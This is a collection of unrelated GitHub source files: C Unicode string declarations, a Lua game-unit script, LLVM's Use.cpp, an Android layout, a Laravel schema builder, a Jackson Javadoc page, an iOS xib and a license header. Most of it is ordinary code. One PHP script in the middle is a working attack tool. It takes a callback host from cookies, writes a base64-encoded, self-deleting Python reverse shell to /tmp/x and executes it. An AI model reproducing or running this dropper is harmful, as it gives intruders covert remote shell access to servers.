u32_strstr (const uint32_t *haystack, const uint32_t *needle)
_UC_ATTRIBUTE_PURE;
/* Test whether STR starts with PREFIX. */
extern bool
u8_startswith (const uint8_t *str, const uint8_t *prefix)
_UC_ATTRIBUTE_PURE;
extern bool
u16_startswith (const uint16_t *str, const uint16_t *prefix)
_UC_ATTRIBUTE_PURE;
extern bool
u32_startswith (const uint32_t *str, const uint32_t *prefix)
_UC_ATTRIBUTE_PURE;
/* Test whether STR ends with SUFFIX. */
extern bool
u8_endswith (const uint8_t *str, const uint8_t *suffix)
_UC_ATTRIBUTE_PURE;
extern bool
u16_endswith (const uint16_t *str, const uint16_t *suffix)
_UC_ATTRIBUTE_PURE;
extern bool
u32_endswith (const uint32_t *str, const uint32_t *suffix)
_UC_ATTRIBUTE_PURE;
/* Divide STR into tokens separated by characters in DELIM.
This interface is actually more similar to wcstok than to strtok. */
/* Similar to strtok_r(), wcstok(). */
extern uint8_t *
u8_strtok (uint8_t *str, const uint8_t *delim, uint8_t **ptr);
extern uint16_t *
u16_strtok (uint16_t *str, const uint16_t *delim, uint16_t **ptr);
extern uint32_t *
u32_strtok (uint32_t *str, const uint32_t *delim, uint32_t **ptr);
#ifdef __cplusplus
}
#endif
#endif /* _UNISTR_H */
| {
"pile_set_name": "Github"
} |
base, turret, barrel1, firepoint1, dirt = piece('base', 'turret', 'barrel1', 'firepoint1', 'dirt')
local SIG_AIM = {}
-- state variables
isMoving = "isMoving"
terrainType = "terrainType"
function script.Create()
StartThread(common.SmokeUnit, {base, turret, barrel1})
end
common = include("headers/common_includes_lus.lua")
function script.setSFXoccupy(setSFXoccupy_argument)
common.setSFXoccupy(setSFXoccupy_argument)
end
function script.StartMoving()
isMoving = true
StartThread(thrust)
end
function script.StopMoving()
isMoving = false
end
function thrust()
common.DirtTrail()
end
local function RestoreAfterDelay()
Sleep(2000)
Turn(turret, y_axis, 0, 5)
Turn(barrel1, x_axis, 0, 5)
end
function script.AimFromWeapon(weaponID)
--Spring.Echo("AimFromWeapon: FireWeapon")
return turret
end
function script.QueryWeapon(weaponID)
--Spring.Echo("QueryWeapon: FireWeapon")
return firepoint1
end
function script.AimWeapon(weaponID, heading, pitch)
Signal(SIG_AIM)
SetSignalMask(SIG_AIM)
Turn(turret, y_axis, heading, 100)
Turn(barrel1, x_axis, -pitch, 100)
WaitForTurn(turret, y_axis)
WaitForTurn(barrel1, x_axis)
StartThread(RestoreAfterDelay)
--Spring.Echo("AimWeapon: FireWeapon")
return true
end
function script.FireWeapon(weaponID)
--Spring.Echo("FireWeapon: FireWeapon")
EmitSfx (firepoint1, 1024)
end
function script.Killed()
Explode(barrel1, SFX.EXPLODE_ON_HIT)
Explode(turret, SFX.EXPLODE_ON_HIT)
return 1 -- spawn ARMSTUMP_DEAD corpse / This is the equivalent of corpsetype = 1; in bos
end | {
"pile_set_name": "Github"
} |
//===-- Use.cpp - Implement the Use class ---------------------------------===//
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
#include "llvm/IR/Use.h"
#include "llvm/IR/User.h"
#include "llvm/IR/Value.h"
#include <new>
namespace llvm {
void Use::swap(Use &RHS) {
if (Val == RHS.Val)
return;
if (Val)
removeFromList();
Value *OldVal = Val;
if (RHS.Val) {
RHS.removeFromList();
Val = RHS.Val;
Val->addUse(*this);
} else {
Val = nullptr;
}
if (OldVal) {
RHS.Val = OldVal;
RHS.Val->addUse(RHS);
} else {
RHS.Val = nullptr;
}
}
User *Use::getUser() const {
const Use *End = getImpliedUser();
const UserRef *ref = reinterpret_cast<const UserRef *>(End);
return ref->getInt() ? ref->getPointer()
: reinterpret_cast<User *>(const_cast<Use *>(End));
}
unsigned Use::getOperandNo() const {
return this - getUser()->op_begin();
}
// Sets up the waymarking algorithm's tags for a series of Uses. See the
// algorithm details here:
//
// http://www.llvm.org/docs/ProgrammersManual.html#the-waymarking-algorithm
//
Use *Use::initTags(Use *const Start, Use *Stop) {
ptrdiff_t Done = 0;
while (Done < 20) {
if (Start == Stop--)
return Start;
static const PrevPtrTag tags[20] = {
fullStopTag, oneDigitTag, stopTag, oneDigitTag, oneDigitTag,
stopTag, zeroDigitTag, oneDigitTag, oneDigitTag, stopTag,
zeroDigitTag, oneDigitTag, zeroDigitTag, oneDigitTag, stopTag,
oneDigitTag, oneDigitTag, oneDigitTag, oneDigitTag, stopTag};
new (Stop) Use(tags[Done++]);
}
ptrdiff_t Count = Done;
while (Start != Stop) {
--Stop;
if (!Count) {
new (Stop) Use(stopTag);
++Done;
Count = Done;
} else {
new (Stop) Use(PrevPtrTag(Count & 1));
Count >>= 1;
++Done;
}
}
return Start;
}
void Use::zap(Use *Start, const Use *Stop, bool del) {
while (Start != Stop)
(--Stop)->~Use();
if (del)
::operator delete(Start);
}
const Use *Use::getImpliedUser() const {
const Use *Current = this;
while (true) {
unsigned Tag = (Current++)->Prev.getInt();
switch (Tag) {
case zeroDigitTag:
case oneDigitTag:
continue;
case stopTag: {
++Current;
ptrdiff_t Offset = 1;
while (true) {
unsigned Tag = Current->Prev.getInt();
switch (Tag) {
case zeroDigitTag:
case oneDigitTag:
++Current;
Offset = (Offset << 1) + Tag;
continue;
default:
return Current + Offset;
}
}
}
case fullStopTag:
return Current;
}
}
}
} // End llvm namespace
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?><!--
~ Copyright (c) 2014-2015 Luis M. Gallardo D.
~ All rights reserved. This program and the accompanying materials
~ are made available under the terms of the GNU Lesser General Public License v3.0
~ which accompanies this distribution, and is available at
~ http://www.gnu.org/licenses/lgpl.html
~
-->
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:orientation="horizontal">
<LinearLayout
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:orientation="horizontal"
android:paddingRight="10dp"
android:paddingTop="10dp"
android:paddingBottom="10dp"
android:background="?backgroundSelector" >
<ImageView
android:id="@+id/icon"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_marginEnd="5dp"
android:layout_marginRight="5dp"
android:contentDescription="@string/icon"
android:src="@drawable/ic_action_recheck" />
<LinearLayout
android:layout_width="0dp"
android:layout_height="wrap_content"
android:layout_weight="1"
android:orientation="vertical">
<TextView
android:id="@+id/name"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="name"
android:textSize="15sp"
android:textStyle="bold" />
<LinearLayout
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:orientation="horizontal">
<TextView
android:id="@+id/info"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="info"
android:textSize="13sp" />
</LinearLayout>
</LinearLayout>
</LinearLayout>
</LinearLayout> | {
"pile_set_name": "Github"
} |
<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell =
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0) on Sun Jul 19 11:36:55 PDT 2015 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver (jackson-databind 2.6.0 API)</title>
<meta name="date" content="2015-07-19">
<link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver (jackson-databind 2.6.0 API)";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?com/fasterxml/jackson/databind/module/class-use/SimpleAbstractTypeResolver.html" target="_top">Frames</a></li>
<li><a href="SimpleAbstractTypeResolver.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver" class="title">Uses of Class<br>com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#com.fasterxml.jackson.databind.module">com.fasterxml.jackson.databind.module</a></td>
<td class="colLast">
<div class="block">Package that contains classes and interfaces to help implement
custom extension <a href="../../../../../../com/fasterxml/jackson/databind/Module.html" title="class in com.fasterxml.jackson.databind"><code>Module</code></a>s
(which are registered using
<a href="../../../../../../com/fasterxml/jackson/databind/ObjectMapper.html#registerModule-com.fasterxml.jackson.databind.Module-"><code>ObjectMapper.registerModule(com.fasterxml.jackson.databind.Module)</code></a>.</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="com.fasterxml.jackson.databind.module">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a> in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a></h3>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing fields, and an explanation">
<caption><span>Fields in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a> declared as <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>protected <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></code></td>
<td class="colLast"><span class="typeNameLabel">SimpleModule.</span><code><span class="memberNameLink"><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleModule.html#Z:Z_abstractTypes">_abstractTypes</a></span></code>
<div class="block">Lazily-constructed resolver used for storing mappings from
abstract classes to more specific implementing classes
(which may be abstract or concrete)</div>
</td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a> that return <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><T> <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></code></td>
<td class="colLast"><span class="typeNameLabel">SimpleAbstractTypeResolver.</span><code><span class="memberNameLink"><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html#addMapping-java.lang.Class-java.lang.Class-">addMapping</a></span>(<a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Class.html?is-external=true" title="class or interface in java.lang">Class</a><T> superType,
<a href="http://docs.oracle.com/javase/6/docs/api/java/lang/Class.html?is-external=true" title="class or interface in java.lang">Class</a><? extends T> subType)</code>
<div class="block">Method for adding a mapping from super type to specific subtype.</div>
</td>
</tr>
</tbody>
</table>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../../com/fasterxml/jackson/databind/module/package-summary.html">com.fasterxml.jackson.databind.module</a> with parameters of type <a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="typeNameLabel">SimpleModule.</span><code><span class="memberNameLink"><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleModule.html#setAbstractTypes-com.fasterxml.jackson.databind.module.SimpleAbstractTypeResolver-">setAbstractTypes</a></span>(<a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">SimpleAbstractTypeResolver</a> atr)</code>
<div class="block">Resets currently configured abstract type mappings</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../../com/fasterxml/jackson/databind/module/SimpleAbstractTypeResolver.html" title="class in com.fasterxml.jackson.databind.module">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../../index.html?com/fasterxml/jackson/databind/module/class-use/SimpleAbstractTypeResolver.html" target="_top">Frames</a></li>
<li><a href="SimpleAbstractTypeResolver.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>Copyright © 2014–2015 <a href="http://fasterxml.com/">FasterXML</a>. All rights reserved.</small></p>
</body>
</html>
| {
"pile_set_name": "Github"
} |
<?php
namespace Illuminate\Database\Schema;
class PostgresBuilder extends Builder
{
/**
* Determine if the given table exists.
*
* @param string $table
* @return bool
*/
public function hasTable($table)
{
[$schema, $table] = $this->parseSchemaAndTable($table);
$table = $this->connection->getTablePrefix().$table;
return count($this->connection->select(
$this->grammar->compileTableExists(), [$schema, $table]
)) > 0;
}
/**
* Drop all tables from the database.
*
* @return void
*/
public function dropAllTables()
{
$tables = [];
$excludedTables = ['spatial_ref_sys'];
foreach ($this->getAllTables() as $row) {
$row = (array) $row;
$table = reset($row);
if (! in_array($table, $excludedTables)) {
$tables[] = $table;
}
}
if (empty($tables)) {
return;
}
$this->connection->statement(
$this->grammar->compileDropAllTables($tables)
);
}
/**
* Drop all views from the database.
*
* @return void
*/
public function dropAllViews()
{
$views = [];
foreach ($this->getAllViews() as $row) {
$row = (array) $row;
$views[] = reset($row);
}
if (empty($views)) {
return;
}
$this->connection->statement(
$this->grammar->compileDropAllViews($views)
);
}
/**
* Get all of the table names for the database.
*
* @return array
*/
protected function getAllTables()
{
return $this->connection->select(
$this->grammar->compileGetAllTables($this->connection->getConfig('schema'))
);
}
/**
* Get all of the view names for the database.
*
* @return array
*/
protected function getAllViews()
{
return $this->connection->select(
$this->grammar->compileGetAllViews($this->connection->getConfig('schema'))
);
}
/**
* Get the column listing for a given table.
*
* @param string $table
* @return array
*/
public function getColumnListing($table)
{
[$schema, $table] = $this->parseSchemaAndTable($table);
$table = $this->connection->getTablePrefix().$table;
$results = $this->connection->select(
$this->grammar->compileColumnListing(), [$schema, $table]
);
return $this->connection->getPostProcessor()->processColumnListing($results);
}
/**
* Parse the table name and extract the schema and table.
*
* @param string $table
* @return array
*/
protected function parseSchemaAndTable($table)
{
$table = explode('.', $table);
if (is_array($schema = $this->connection->getConfig('schema'))) {
if (in_array($table[0], $schema)) {
return [array_shift($table), implode('.', $table)];
}
$schema = head($schema);
}
return [$schema ?: 'public', implode('.', $table)];
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.XIB" version="3.0" toolsVersion="9532" systemVersion="15B42" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES">
<dependencies>
<deployment identifier="iOS"/>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="9530"/>
</dependencies>
<objects>
<placeholder placeholderIdentifier="IBFilesOwner" id="-1" userLabel="File's Owner"/>
<placeholder placeholderIdentifier="IBFirstResponder" id="-2" customClass="UIResponder"/>
<view contentMode="scaleToFill" id="iN0-l3-epB" customClass="XFContentVoiceView">
<rect key="frame" x="0.0" y="0.0" width="384" height="256"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<subviews>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" translatesAutoresizingMaskIntoConstraints="NO" id="wOM-RW-NBc">
<rect key="frame" x="0.0" y="0.0" width="384" height="243"/>
</imageView>
<button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="1Zt-hv-Mj3">
<rect key="frame" x="162" y="196" width="60" height="60"/>
<constraints>
<constraint firstAttribute="width" constant="60" id="Zyd-fc-Nwp"/>
<constraint firstAttribute="height" constant="60" id="nNi-YZ-J9O"/>
</constraints>
<state key="normal" image="playButtonPlay" backgroundImage="playButton"/>
<connections>
<action selector="playBtn:" destination="iN0-l3-epB" eventType="touchUpInside" id="Zg1-Zf-vFn"/>
</connections>
</button>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="08:52" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="suj-YQ-pqU">
<rect key="frame" x="344" y="227" width="40" height="16"/>
<color key="backgroundColor" white="0.0" alpha="0.5" colorSpace="calibratedWhite"/>
<constraints>
<constraint firstAttribute="height" constant="16" id="ArB-R6-N6N"/>
<constraint firstAttribute="width" constant="40" id="CVs-pm-auK"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="13"/>
<color key="textColor" red="1" green="1" blue="1" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="9999播放" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="o1d-eC-UW8">
<rect key="frame" x="0.0" y="227" width="80" height="16"/>
<color key="backgroundColor" white="0.0" alpha="0.5" colorSpace="calibratedWhite"/>
<constraints>
<constraint firstAttribute="width" constant="80" id="D7c-mR-zvU"/>
<constraint firstAttribute="height" constant="16" id="Tu4-gm-qKn"/>
</constraints>
<fontDescription key="fontDescription" type="system" pointSize="13"/>
<color key="textColor" red="1" green="1" blue="1" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<imageView userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="imageBackground" translatesAutoresizingMaskIntoConstraints="NO" id="2c9-Ff-2Pr">
<rect key="frame" x="0.0" y="15" width="384" height="25"/>
<constraints>
<constraint firstAttribute="height" constant="25" id="9OY-Nw-I1p"/>
</constraints>
</imageView>
</subviews>
<color key="backgroundColor" white="1" alpha="1" colorSpace="custom" customColorSpace="calibratedWhite"/>
<constraints>
<constraint firstAttribute="bottom" secondItem="wOM-RW-NBc" secondAttribute="bottom" constant="13" id="5mH-zj-8Hd"/>
<constraint firstItem="suj-YQ-pqU" firstAttribute="bottom" secondItem="wOM-RW-NBc" secondAttribute="bottom" id="9AF-Mi-QHr"/>
<constraint firstAttribute="bottom" secondItem="1Zt-hv-Mj3" secondAttribute="bottom" id="Fmv-Za-g17"/>
<constraint firstItem="suj-YQ-pqU" firstAttribute="trailing" secondItem="wOM-RW-NBc" secondAttribute="trailing" id="Ho5-UF-f58"/>
<constraint firstItem="2c9-Ff-2Pr" firstAttribute="leading" secondItem="iN0-l3-epB" secondAttribute="leading" id="LLO-AQ-qHV"/>
<constraint firstItem="2c9-Ff-2Pr" firstAttribute="top" secondItem="iN0-l3-epB" secondAttribute="top" constant="15" id="M51-OS-OIy"/>
<constraint firstItem="wOM-RW-NBc" firstAttribute="leading" secondItem="iN0-l3-epB" secondAttribute="leading" id="PEv-QX-FX9"/>
<constraint firstAttribute="trailing" secondItem="wOM-RW-NBc" secondAttribute="trailing" id="U3M-sW-CuU"/>
<constraint firstItem="o1d-eC-UW8" firstAttribute="top" secondItem="wOM-RW-NBc" secondAttribute="bottom" constant="-16" id="UW3-Fm-CFX"/>
<constraint firstAttribute="trailing" secondItem="2c9-Ff-2Pr" secondAttribute="trailing" id="WW2-mz-BMq"/>
<constraint firstItem="wOM-RW-NBc" firstAttribute="top" secondItem="iN0-l3-epB" secondAttribute="top" id="b1n-tE-v0V"/>
<constraint firstItem="o1d-eC-UW8" firstAttribute="leading" secondItem="wOM-RW-NBc" secondAttribute="leading" id="c9p-FI-aAG"/>
<constraint firstItem="1Zt-hv-Mj3" firstAttribute="centerX" secondItem="iN0-l3-epB" secondAttribute="centerX" id="ify-Vd-Kql"/>
</constraints>
<nil key="simulatedStatusBarMetrics"/>
<freeformSimulatedSizeMetrics key="simulatedDestinationMetrics"/>
<connections>
<outlet property="imageView" destination="wOM-RW-NBc" id="Zdv-4S-scd"/>
<outlet property="playBtn" destination="1Zt-hv-Mj3" id="XWc-t6-5Tw"/>
<outlet property="playCount" destination="o1d-eC-UW8" id="WZb-SL-iPJ"/>
<outlet property="playTime" destination="suj-YQ-pqU" id="w8D-GJ-IhA"/>
</connections>
<point key="canvasLocation" x="580" y="219"/>
</view>
</objects>
<resources>
<image name="imageBackground" width="75" height="15"/>
<image name="playButton" width="63" height="63"/>
<image name="playButtonPlay" width="30" height="30"/>
</resources>
</document>
| {
"pile_set_name": "Github"
} |
// Copyright 2010-2020, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
